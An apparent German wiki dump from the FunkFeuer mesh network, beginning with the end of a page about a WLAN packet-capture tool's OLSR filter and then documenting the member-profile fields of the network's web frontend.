[o] OLSR Pakete filtern (aktivieren/deaktivieren)
[q] beenden

== Screenshots ==

[[Bild:0xff_screenshot_horst_all_2.jpg|thumb|Bild1: ungefiltertes Capturing]]
[[Bild:0xff_screenshot_horst_olsr_2.jpg|thumb|Bild2: OLSR Filter]]
Bild1: ungefiltertes Capturing (mit Beacons, inkl. Beacons von !OLSR-Knoten zb. hier Station 'chome')

Bild2: OLSR Filter aktiv (LQ-Messages, HNA-Announces, etc.)

Frontend Mitglied

2007-03-17T12:16:51Z

Cnagl: /* Mitglieder */

{{Frontend_Navigation}}

== Mitglieder ==
[[Bild:Frontend_Mitglied.png|thumb|right|Screenshot]]

Mitglieder sind die Betreiber und damit die Verantwortlichen der [[Nodes]] des FunkFeuer Netzwerkes.
"Mitglieder" werden bei [http://www.funkfeuer.at/Montagstreffen.102.0.html Montagstreffs] von Admins angelegt.
Das "Mitglied" kann dann (fast) alle Parameter selbst ändern.

=== * Nickname ===
Wird beim Anlegen des neuen Mitglieds in der Datenbank von einem Admin eingetragen und kann nicht nachträglich verändert werden.
Dies ist auch der Name für die Anmeldung beim [[Frontend]].

=== * Passwort ===
Dies ist das Passwort für die Anmeldung beim [[Frontend]].
Jedes Passwort ist erlaubt, außer kein Passwort.

=== * Vorname ===
Wird vor dem Anlegen des neuen Mitglieds in der Datenbank von einem Admin geprüft, anschließend eingetragen und kann vom Mitglied nicht nachträglich verändert werden.

=== * Nachname ===
Wird vor dem Anlegen des neuen Mitglieds in der Datenbank von einem Admin geprüft, anschließend eingetragen und kann vom Mitglied nicht nachträglich verändert werden.

=== * Straße ===
Wohnort des Mitglieds (Strasse, z.B. Liebiggasse)

=== * Hausnummer ===
Wohnort des Mitglieds (Hausnummer z.B. 1a)

=== * PLZ ===
Wohnort des Mitglieds (PLZ, z.B. 1010)

=== * Ort ===
Wohnort des Mitglieds (Ort, z.B. Wien)

=== Telefon ===
Telefonnummer des Mitglieds (für die Kontaktaufnahme in dringenden Fällen)

=== Handy ===
Mobiltelefonnummer des Mitglieds (für die Kontaktaufnahme in dringenden Fällen)

=== Fax ===
Faxnummer des Mitglieds

=== * E-Mail ===
E-Mail Adresse des Mitglieds (für die Kontaktaufnahme in dringenden Fällen)

=== Homepage ===
Optional, wird nicht ausgewertet

=== Ändern ===
Ein klick auf "Ändern" überprüft die Eingaben und speichert gegebenenfalls die Änderungen
[[Bild:Frontend_Mitglied_confirmed.png|thumb|none|erfolgreich gespeichert]]
Mit * gekenzeichnete Felder müssen ausgefüllt werden
[[Category:Frontend]]